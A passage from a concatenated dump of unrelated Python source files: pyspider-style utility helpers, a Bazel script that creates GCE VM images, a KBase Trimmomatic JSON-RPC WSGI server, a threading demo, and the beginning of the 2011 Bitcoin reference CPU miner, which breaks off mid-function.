format = "yesterday" if shorter else "yesterday at %(time)s"
elif days < 5:
format = "%(weekday)s" if shorter else "%(weekday)s at %(time)s"
elif days < 334: # 11mo, since confusing for same month last year
format = "%(month)s-%(day)s" if shorter else \
"%(month)s-%(day)s at %(time)s"
if format is None:
format = "%(month_name)s %(day)s, %(year)s" if shorter else \
"%(month_name)s %(day)s, %(year)s at %(time)s"
str_time = "%d:%02d" % (local_date.hour, local_date.minute)
return format % {
"month_name": local_date.strftime('%b'),
"weekday": local_date.strftime('%A'),
"day": str(local_date.day),
"year": str(local_date.year),
"month": local_date.month,
"time": str_time
}
class TimeoutError(Exception):
pass
try:
import signal
if not hasattr(signal, 'SIGALRM'):
raise ImportError('signal')
class timeout:
"""
Time limit of command
with timeout(3):
time.sleep(10)
"""
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message)
def __enter__(self):
if self.seconds:
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
if self.seconds:
signal.alarm(0)
except ImportError:
class timeout:
"""
Time limit of command (for windows)
"""
def __init__(self, seconds=1, error_message='Timeout'):
pass
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def utf8(string):
"""
Make sure string is utf8 encoded bytes.
If parameter is a object, object.__str__ will been called before encode as bytes
"""
if isinstance(string, six.text_type):
return string.encode('utf8')
elif isinstance(string, six.binary_type):
return string
else:
return six.text_type(string).encode('utf8')
def text(string, encoding='utf8'):
"""
Make sure string is unicode type, decode with given encoding if it's not.
If parameter is a object, object.__str__ will been called
"""
if isinstance(string, six.text_type):
return string
elif isinstance(string, six.binary_type):
return string.decode(encoding)
else:
return six.text_type(string)
def pretty_unicode(string):
"""
Make sure string is unicode, try to decode with utf8, or unicode escaped string if failed.
"""
if isinstance(string, six.text_type):
return string
try:
return string.decode("utf8")
except UnicodeDecodeError:
return string.decode('Latin-1').encode('unicode_escape').decode("utf8")
def unicode_string(string):
"""
Make sure string is unicode, try to default with utf8, or base64 if failed.
can been decode by `decode_unicode_string`
"""
if isinstance(string, six.text_type):
return string
try:
return string.decode("utf8")
except UnicodeDecodeError:
return '[BASE64-DATA]' + base64.b64encode(string) + '[/BASE64-DATA]'
def unicode_dict(_dict):
"""
Make sure keys and values of dict is unicode.
"""
r = {}
for k, v in iteritems(_dict):
r[unicode_string(k)] = unicode_obj(v)
return r
def unicode_list(_list):
"""
Make sure every element in list is unicode. bytes will encode in base64
"""
return [unicode_obj(x) for x in _list]
def unicode_obj(obj):
"""
Make sure keys and values of dict/list/tuple is unicode. bytes will encode in base64.
Can been decode by `decode_unicode_obj`
"""
if isinstance(obj, dict):
return unicode_dict(obj)
elif isinstance(obj, (list, tuple)):
return unicode_list(obj)
elif isinstance(obj, six.string_types):
return unicode_string(obj)
elif isinstance(obj, (int, float)):
return obj
elif obj is None:
return obj
else:
try:
return text(obj)
except:
return text(repr(obj))
def decode_unicode_string(string):
"""
Decode string encoded by `unicode_string`
"""
if string.startswith('[BASE64-DATA]') and string.endswith('[/BASE64-DATA]'):
return base64.b64decode(string[len('[BASE64-DATA]'):-len('[/BASE64-DATA]')])
return string
def decode_unicode_obj(obj):
"""
Decode unicoded dict/list/tuple encoded by `unicode_obj`
"""
if isinstance(obj, dict):
r = {}
for k, v in iteritems(obj):
r[decode_unicode_string(k)] = decode_unicode_obj(v)
return r
elif isinstance(obj, six.string_types):
return decode_unicode_string(obj)
elif isinstance(obj, (list, tuple)):
return [decode_unicode_obj(x) for x in obj]
else:
return obj
class Get(object):
"""
Lazy value calculate for object
"""
def __init__(self, getter):
self.getter = getter
def __get__(self, instance, owner):
return self.getter()
class ObjectDict(dict):
"""
Object like dict, every dict[key] can visite by dict.key
If dict[key] is `Get`, calculate it's value.
"""
def __getattr__(self, name):
ret = self.__getitem__(name)
if hasattr(ret, '__get__'):
return ret.__get__(self, ObjectDict)
return ret
def load_object(name):
"""Load object from module"""
if "." not in name:
raise Exception('load object need module.object')
module_name, object_name = name.rsplit('.', 1)
if six.PY2:
module = __import__(module_name, globals(), locals(), [utf8(object_name)], -1)
else:
module = __import__(module_name, globals(), locals(), [object_name])
return getattr(module, object_name)
def get_python_console(namespace=None):
"""
Return a interactive python console instance with caller's stack
"""
if namespace is None:
import inspect
frame = inspect.currentframe()
caller = frame.f_back
if not caller:
logging.error("can't find caller who start this console.")
caller = frame
namespace = dict(caller.f_globals)
namespace.update(caller.f_locals)
try:
from IPython.terminal.interactiveshell import TerminalInteractiveShell
shell = TerminalInteractiveShell(user_ns=namespace)
except ImportError:
try:
import readline
import rlcompleter
readline.set_completer(rlcompleter.Completer(namespace).complete)
readline.parse_and_bind("tab: complete")
except ImportError:
pass
import code
shell = code.InteractiveConsole(namespace)
shell._quit = False
def exit():
shell._quit = True
def readfunc(prompt=""):
if shell._quit:
raise EOFError
return six.moves.input(prompt)
# inject exit method
shell.ask_exit = exit
shell.raw_input = readfunc
return shell
def python_console(namespace=None):
"""Start a interactive python console with caller's stack"""
if namespace is None:
import inspect
frame = inspect.currentframe()
caller = frame.f_back
if not caller:
logging.error("can't find caller who start this console.")
caller = frame
namespace = dict(caller.f_globals)
namespace.update(caller.f_locals)
return get_python_console(namespace=namespace).interact()
|
create_images.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import json
import os
import queue
import subprocess
import sys
import tempfile
import threading
import gcloud
import gcloud_utils
DEBUG = False
IMAGE_CREATION_VMS = {
# Find the newest FreeBSD 11 image via:
# gcloud compute images list --project freebsd-org-cloud-dev \
# --no-standard-images
# ('bk-freebsd11',): {
# 'source_image': 'https://www.googleapis.com/compute/v1/projects/freebsd-org-cloud-dev/global/images/freebsd-11-1-stable-amd64-2017-12-28',
# 'scripts': [
# 'setup-freebsd.sh',
# 'install-buildkite-agent.sh'
# ]
# },
"bk-docker": {
"project": "bazel-untrusted",
"zone": "europe-north1-a",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1804-lts",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-trusted-docker": {
"project": "bazel-public",
"zone": "europe-west1-c",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1804-lts",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-windows-java8": {
"project": "bazel-untrusted",
"zone": "europe-north1-a",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1803-core",
"setup_script": "setup-windows.ps1",
},
"bk-trusted-windows-java8": {
"project": "bazel-public",
"zone": "europe-west1-c",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1803-core",
"setup_script": "setup-windows.ps1",
},
"windows-playground": {
"project": "di-cloud-exp",
"zone": "europe-west1-c",
"network": "default",
"source_image_project": "windows-cloud",
"source_image_family": "windows-2019",
"setup_script": "setup-windows.ps1",
},
}
WORK_QUEUE = queue.Queue()
def run(args, **kwargs):
return subprocess.run(args, **kwargs)
def preprocess_setup_script(setup_script, is_windows):
output_file = tempfile.mkstemp()[1]
newline = "\r\n" if is_windows else "\n"
with open(output_file, "w", newline=newline) as f:
with open(setup_script, "r") as setup_script_file:
if is_windows:
f.write("$setup_script = @'\n")
f.write(setup_script_file.read() + "\n")
if is_windows:
f.write("'@\n")
f.write('[System.IO.File]::WriteAllLines("c:\\setup.ps1", $setup_script)\n')
return output_file
def create_instance(instance_name, params):
is_windows = "windows" in instance_name
setup_script = preprocess_setup_script(params["setup_script"], is_windows)
try:
if is_windows:
startup_script = "windows-startup-script-ps1=" + setup_script
else:
startup_script = "startup-script=" + setup_script
if "source_image" in params:
image = {"image": params["source_image"]}
else:
image = {
"image-project": params["source_image_project"],
"image-family": params["source_image_family"],
}
gcloud.create_instance(
instance_name,
project=params["project"],
zone=params["zone"],
machine_type="n1-standard-8",
network=params.get("network", "buildkite"),
metadata_from_file=startup_script,
min_cpu_platform="Intel Skylake",
boot_disk_type="pd-ssd",
boot_disk_size="50GB",
**image,
)
finally:
os.remove(setup_script)
# https://stackoverflow.com/a/25802742
def write_to_clipboard(output):
process = subprocess.Popen("pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE)
process.communicate(output.encode("utf-8"))
def print_windows_instructions(project, zone, instance_name):
tail_start = gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, until="Finished running startup scripts"
)
pw = json.loads(
gcloud.reset_windows_password(
instance_name, format="json", project=project, zone=zone
).stdout
)
rdp_file = tempfile.mkstemp(suffix=".rdp")[1]
with open(rdp_file, "w") as f:
f.write("full address:s:" + pw["ip_address"] + "\n")
f.write("username:s:" + pw["username"] + "\n")
subprocess.run(["open", rdp_file])
write_to_clipboard(pw["password"])
with gcloud.PRINT_LOCK:
print("Use this password to connect to the Windows VM: " + pw["password"])
print("Please run the setup script C:\\setup.ps1 once you're logged in.")
# Wait until the VM reboots once, then open RDP again.
tail_start = gcloud_utils.tail_serial_console(
instance_name,
project=project,
zone=zone,
start=tail_start,
until="Finished running startup scripts",
)
print("Connecting via RDP a second time to finish the setup...")
write_to_clipboard(pw["password"])
run(["open", rdp_file])
return tail_start
def workflow(name, params):
instance_name = "%s-image-%s" % (name, int(datetime.now().timestamp()))
project = params["project"]
zone = params["zone"]
try:
# Create the VM.
create_instance(instance_name, params)
# Wait for the VM to become ready.
gcloud_utils.wait_for_instance(instance_name, project=project, zone=zone, status="RUNNING")
if "windows" in instance_name:
# Wait for VM to be ready, then print setup instructions.
tail_start = print_windows_instructions(project, zone, instance_name)
# Continue printing the serial console until the VM shuts down.
gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, start=tail_start
)
else:
# Continuously print the serial console.
gcloud_utils.tail_serial_console(instance_name, project=project, zone=zone)
# Wait for the VM to completely shutdown.
gcloud_utils.wait_for_instance(
instance_name, project=project, zone=zone, status="TERMINATED"
)
# Create a new image from our VM.
gcloud.create_image(
instance_name,
project=project,
family=name,
source_disk=instance_name,
source_disk_zone=zone,
licenses=params.get("licenses", []),
)
finally:
gcloud.delete_instance(instance_name, project=project, zone=zone)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
workflow(**item)
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
print("Usage: create_images.py {}".format(" ".join(IMAGE_CREATION_VMS.keys())))
return 1
unknown_args = set(argv).difference(IMAGE_CREATION_VMS.keys())
if unknown_args:
print(
"Unknown platforms: {}\nAvailable platforms: {}".format(
", ".join(unknown_args), ", ".join(IMAGE_CREATION_VMS.keys())
)
)
return 1
if subprocess.check_output(["git", "status", "--porcelain"], universal_newlines=True).strip():
print(
"There are pending changes in your Git repository. You have to commit "
"them, before create_images.py can continue.",
file=sys.stderr,
)
return 1
# Put VM creation instructions into the work queue.
for name in argv:
WORK_QUEUE.put({"name": name, "params": IMAGE_CREATION_VMS[name]})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
kb_trimmomaticServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_trimmomatic.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_trimmomatic'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_trimmomatic.kb_trimmomaticImpl import kb_trimmomatic # noqa @IgnorePep8
impl_kb_trimmomatic = kb_trimmomatic(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_trimmomatic'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_trimmomatic.runTrimmomatic,
name='kb_trimmomatic.runTrimmomatic',
types=[dict])
self.method_authentication['kb_trimmomatic.runTrimmomatic'] = 'required' # noqa
self.rpc_service.add(impl_kb_trimmomatic.execTrimmomatic,
name='kb_trimmomatic.execTrimmomatic',
types=[dict])
self.method_authentication['kb_trimmomatic.execTrimmomatic'] = 'required' # noqa
self.rpc_service.add(impl_kb_trimmomatic.execTrimmomaticSingleLibrary,
name='kb_trimmomatic.execTrimmomaticSingleLibrary',
types=[dict])
self.method_authentication['kb_trimmomatic.execTrimmomaticSingleLibrary'] = 'required' # noqa
self.rpc_service.add(impl_kb_trimmomatic.status,
name='kb_trimmomatic.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_trimmomatic ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
mul_thread.py
|
import threading
import time
from threading import Thread
def deal_time():
thread_num = threading.current_thread()
print(f"time is {time.time},thread num is {thread_num}")
for index in range(10):
thread = Thread(target=deal_time, name="deal_time" + str(index))
thread.start()
print("输出主线程信息", threading.current_thread())
num = 0
def sum_value():
global num
for index in range(10000):
num += index
sum_value()
# thread_sum = Thread(target=sum_value)
# thread_sum1 = Thread(target=sum_value)
# thread_sum.start()
# thread_sum1.start()
# thread_sum.join()
# thread_sum1.join()
print(f"num is {num}")
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
